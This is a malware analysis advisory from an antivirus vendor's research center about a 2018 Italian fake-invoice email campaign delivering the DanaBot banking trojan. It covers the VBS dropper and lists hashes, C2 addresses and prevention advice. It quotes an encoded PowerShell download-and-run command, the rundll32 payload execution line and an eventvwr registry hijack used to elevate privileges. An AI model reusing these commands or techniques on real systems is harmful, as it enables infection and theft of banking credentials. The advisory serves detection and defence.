TG Soft' s C.R.A.M. (Anti-Malware Research Center) examined an email included in a campaign spreading the malware Trojan DanaBot sent on November 27, 2018.
Cyber-criminals developed "Social engineering" methods for fraudulent mass mailings, to induce the victim to open infected attachments or click on links in the body of the message.
If you received a suspicious email, send it to C.R.A.M. (Center for Anti-Malware Research): How to send suspicious emails
|
INDEX
|
FaKE Mail "la fattura-X6351" spreads Trojan DanaBot
Description:
The email was detected in the morning of November 27, 2018.
The email, in addition to a short text, contains a .rar attachment inside which there is a VBS script that, if executed, will lead to the download of the
DanaBot malware.
Example of examined email:
|
Subject: la fattura-X6351
|
 |
| la fattura-X6351 - Mozilla Thunderbird |
Da:
Oggetto: la fattura-X6351
A: |
Buongiorno,
inviamo la fattura, che troverete in allegato.
Di seguito vi presentiamo il suo riassunto.
Numero della fattura: SD/203/11/2018
Data di emissione: 2018-11-26
Termine di pagamento: 2018-12-12
[Ma (REDACTED)]
[SIC (REDACTED)]
|
| 1 allegato: F112007.rar |
|
How it spreads:
The e-mail informs the user that an invoice has been sent as an attachment by presenting a brief summary of the invoice in the body of the message (number, date of issue, payment deadline).
The email contains a .rar attachment:
- File Name: F112007.rar
- Size: 743 Bytes
- Md5: C573BC246DED8048115AF4BFD5890B2C
The .rar file in turn contains the dropper in VBS Script format:
- File Name: F112007.vbs
- Size: 1467 Bytes
- Md5: 4DAF59E4C6F2CFBF699737A23E15ECE7
- Malware family: Dropper
- VirIT: Trojan.VBS.Dropper.BDE
Once the VBS file is executed, continuous attempts will be made to connect to the site:
The VBS script receives from
kortusops[.]icu various VBScript or Powershell commands, for example:
powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AY
QBkA[........]bwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AJwAg
ACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA== |
One of the Powershell commands tries to connect to the URL:
flutysowf[.]club/chkesosod/downs/EFnfZ but without success. Others instead make the connection to the URL:
http[:]//kortusops[.]icu/fax[.]php?id=admin
The received commands lead to the download to the user's temporary folder (%TEMP%) of the malware payload:
- File Name: iVRYziRI.dll
- Size: 307200 Bytes
- Compilation date: 26/11/2018 - 22:53:06
- Md5: 54F9A571CEFD6FA6A9E855BF5F6777D7
- Malware family: DanaBot
- VirIT: Trojan.Win32.DanaBot.AT
with subsequent execution of the downloaded DLL via the command:
C:\WINDOWS\System32\rundll32.exe C:\Users\[UTENTE]\AppData\Local\Temp\iVRYziRI.dll,f1
An additional command sent by
kortusops[.]icu modifies the following registry key:
HKCU\Software\Classes\mscfile\shell\open\command with the following value: C:\WINDOWS\System32\rundll32.exe C:\Users\[UTENTE]\AppData\Local\Temp\iVRYziRI.dll,f1
The system process "eventvwr.exe" is also executed which, through the previously modified key, executes the malware DLL:
C:\WINDOWS\System32\rundll32.exe C:\Users\[UTENTE]\AppData\Local\Temp\iVRYziRI.dll,f1
The
DanaBot malware tries to connect to its command and control (C&C) servers:
- 98[.]200[.]98[.]173
- 125[.]49[.]7[.]96
- 192[.]71[.]249[.]50
- 252[.]30[.]89[.]46
- 176[.]119[.]1[.]100
- 67[.]193[.]194[.]28
- 242[.]34[.]93[.]159
- 175[.]219[.]114[.]70
- 28[.]241[.]235[.]42
- 93[.]38[.]16[.]35
The third stage of the malware, is to perform persistence in the infected PC, through a Service that will run the Malware every time the PC is restarted. However, this stage was not completed during the analysis.
The purpose of the malware, is to exfiltrate login and password access to important sites, such as home banking, e-mail, ftp etc...
Further analysis of the DanaBot malware is available at these addresses:
IOC
MD5:
C573BC246DED8048115AF4BFD5890B2C
4DAF59E4C6F2CFBF699737A23E15ECE7
54F9A571CEFD6FA6A9E855BF5F6777D7
URL:
kortusops[.]icu -> ip: 37[.]10[.]71[.]87
flutysowf[.]club -> ip: 195[.]123[.]216[.]31
98[.]200[.]98[.]173
125[.]49[.]7[.]96
192[.]71[.]249[.]50
252[.]30[.]89[.]46
176[.]119[.]1[.]100
67[.]193[.]194[.]28
242[.]34[.]93[.]159
175[.]219[.]114[.]70
28[.]241[.]235[.]42
93[.]38[.]16[.]35
How to identify a fake email
Experience and common sense are the first weapons to avoid these kinds of scams.
Careful reading of the email, in all its elements, is essential. Be wary of ZIP-formatted attachments and, if possible, DO NOT enable automatic macro execution. It is strongly discouraged to set up automatic execution of macros since simply opening Word and Excel files will see the immediate execution of macros without any prior alert.
In case you have been infected by a Banker, the advice from TG Soft's C.R.A.M., is to take appropriate security precautions even after the remediation of the system(s) involved such as changing the most commonly used passwords on the Web. In case the wokstation involved is used for home-banking transactions, an assessment with your credit institution is also recommended.
How to send suspicious emails for analysis as possible virus/malware/ransomware and/or Phishing attempts
Sending materials to the TG Soft's Anti-Malware Research Center for analysis, which is always free of charge, can be done safely in two ways:
- Any suspect email can be sent directly by the recipient's e-mail, to the following mail lite@virit.com,choosing as sending mode "Forward as Attachment" and inserting in the subject section "Possible phishing page to verify" rather than "Possible Malware to verify";
- Save the e-mail to be sent to TG Soft's C.R.A.M. for analysis as an external file to the e-mail program used. The resulting file must be sent by uploading it from the page Send Suspicious Files (http://www.tgsoft.it/italy/file_sospetti.asp). Obviously if you want a feedback on the analysis of the data submitted, you have to indicate an e-mail address and a brief description of the reason for the submission (for example: possiible / probable phishing; possible / probable malware or other).
All this is to help you by trying to prevent you from running into credential theft, viruses/malware or even worse next-generation Ransomware / Crypto-Malware.
Integrate your PC / SERVER protection with Vir.IT eXplorer Lite
Se non doveste ancora utilizzare Vir.IT eXplorer PRO è consigliabile installare, ad integrazione dell'antivirus in uso per aumentare la sicurezza dei vostri computer, PC e SERVER indifferentemente, Vir.IT eXplorer Lite -FREE Edition-.
Vir.IT eXplorer Lite has the following special features: |
 |
- freely usable in both private and corporate environments with Engine+Signature updates without time limitation;
- Interoperable with any other AntiVirus, AntiSpyware, AntiMalware or Internet Security already present on PCs and SERVERs. We recommend to use it as a supplement to the AntiVirus already in use as it does not conflict or slow down the system but allows to significantly increase security in terms of identification and remediation of infected files;
- It dentifies and, in many cases, even removes most of the viruses/malware actually circulating or, alternatively, allows them to be sent to the C.R.A.M. Anti-Malware Research Center for further analysis to update Vir.It eXplorer PRO;
- Through the Intrusion Detection technology, also made available in the Lite version of Vir.IT eXplorer, the software is able to report any new-generation viruses/malware that have set in automatically and proceed to send the reported files to TG Soft's C.R.A.M.
- Proceed to download Vir.IT eXplorer Lite from the official distribution page of TG Soft's website.
For Vir.IT eXplorer PRO users...
 |
For Vir.IT eXplorer PRO owners, it is also possible to contact for free TG Soft's technical phone support.The details can be found on the support page CLIENTS. |
C.R.A.M.
TG Soft's Anti-Malware Research Center
" />
